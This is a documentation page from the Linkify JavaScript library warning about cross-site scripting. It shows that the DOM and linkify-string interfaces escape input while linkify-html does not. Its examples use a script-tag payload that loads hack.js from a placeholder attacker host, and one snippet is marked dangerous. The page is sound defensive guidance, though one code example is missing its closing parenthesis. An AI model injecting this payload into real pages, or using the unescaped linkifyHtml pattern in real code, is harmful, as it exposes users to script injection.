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Note about Cross-Site Scripting

Linkify is not a validation or XSS-prevention library. Used, improperly, this library can make you vulnerable to cross-site scripting attacks.

In particular, take care when using the linkifyHtml function.

Background: The DOM

The Document Object Model (DOM) is a tree-like data structure that represents an HTML document. The browser uses it to organize and perform operations on a web page that result in on-screen changes.

The DOM is composed of linked nodes with parent/child relationships. All HTML elements such as <html>, <body> or <p> are represented by nodes which are either empty or contain other child HTML element nodes and/or leaf text nodes. Read more about the DOM here.

DOM interfaces are generally safe to use

The following interfaces operate on DOM (or DOM-like) nodes:

The interface assumes all text nodes are plain text. It replaces those nodes with one or more text or <a> anchor element nodes.

For example, the following is safe:

import ReactDOM from "react-dom";
import Linkify from "linkify-react";

const container = document.getElementById("container");
const content =
  '<script src="https://evil.h4ckz.example.com/hack.js"></script>';

ReactDOM.render(<Linkify>{content}</Linkify>, container);

Linkify creates a text node for <script src=", an anchor tag node with href https://evil.h4ckz.example.com/hack.js and a final text node for "></script>.

React translates this into approximately the following DOM code:

const node1 = document.createTextNode('<script src="');

const node2 = document.createElement("a");
node2.setAttribute("href", "https://evil.h4ckz.example.com/hack.js");
node2.innerText = "https://evil.h4ckz.example.com/hack.js";

const node3 = document.createTextNode('"></script>');

Each new text node is automatically “escaped” by the browser: HTML special characters will appear literally on the page. So this code is equivalent to an HTML file with the following content:

&lt;script src="
<a href="https://evil.h4ckz.example.com/hack.js">

Which contains a harmless link to the malicious JavaScript (provided no one downloads and runs it):

linkify-string is generally safe to use

The linkify-string interface assumes that its input is plain-text and outputs HTML. It converts HTML entities in the input to encoded characters.

For example, the following is safe:

document.body.innerHTML = linkifyStr(
  '<script src="https://evil.h4ckz.example.com/hack.js"></script>'

linkifyStr returns escapted text with a harmless link to the malicous JavaScript:

'&lt;script src="<a href="https://evil.h4ckz.example.com/hack.js">https://evil.h4ckz.example.com/hack.js</a>"&gt;&lt;/script&gt;'

linkify-html is UNSAFE if its input is not validated

Unlike linkify-string and the DOM interfaces, the linkify-html interface does NOT automatically escape malicous HTML!! It will parse its input as HTML and output unescaped HTML.

const content =
  '<script src="https://evil.h4ckz.example.com/hack.js"></script>';
document.body.innerHTML = linkifyHtml(content); // DANGEROUS!! hack.js will be executed!!

It is the programmer’s responsibility to escape unwanted HTML before rendering it to the webpage.